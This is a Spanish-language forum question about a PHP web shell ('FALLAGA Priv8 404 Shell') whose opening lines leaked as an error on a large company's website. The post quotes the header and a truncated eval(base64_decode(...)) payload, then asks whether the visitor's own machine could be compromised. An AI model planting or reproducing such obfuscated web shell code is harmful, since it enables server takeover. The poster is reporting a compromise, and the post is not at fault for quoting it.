Visité un sitio web (perteneciente a una gran empresa en el norte de Europa) ayer. Una de sus páginas en la sección "acerca de nosotros" me dio un largo error con un mensaje que comenzó con
<?PhP
/* FALLAGA Priv8 404 Shell V 1.11 */
/* Made y Black cat */
EVaL(BAsE64_DEcODe(’Ci8qICAgICAgCuKUj+KUgeKUk+KUj+KUgeKUk+KVi+KVi+KVi+KVi+KUj+KUk+KUj+KUk+KVi+KUj+KUk+KVi+KVi+KVi+KVi+KVi+KUj+KUkwrilIPilIPilJfilJvilIPilIPilYvilYvilYvilYvilIPilIPilIPilIPilYvilIPilIPilYvilYvilYvilYvilYvilIPilIMK4pSD4pSP4pST4pSP4pST4pSj4pSB4pSB4pSz4pSB4pSb4pSD4pSD4pSX4pSB4pSb4pSj4pSB4pSB4pSz4pSB4pSB4pSr4pSD4pSP4pSB4pSB4pSz4pSB4pSTCuKUg+KUg+KUg+KUg+KUg+KUg+KUj+KUk+KUg+KUj+KUk+KUg+KUg+KUj+KUgeKUk+KUg+KUj+KUk+KUg+KUj+KUgeKUq+KUg+KUg+KUg+KUgeKUq+KUj
La longitud total de la parte con aspecto de galimatías era de aproximadamente 126kb (o de todas formas es el tamaño del archivo ASCII donde lo guardé).
Le informé a la compañía y me dijeron que lo echarían un vistazo.
Desde la perspectiva del cliente, aunque este tipo de cosas me parece un malware de shell inverso integrado que de alguna manera no se ejecutó correctamente.
La pregunta que quería hacer es si debo preocuparme de que mi propio sistema sea pirateado.
Pregunta :
¿Este tipo de mensaje es algo que sucedió únicamente en el servidor, o podría indicar que mi navegador web o sistema operativo está comprometido?
La captura de pantalla del error está debajo. Resalté la parte copiada arriba.
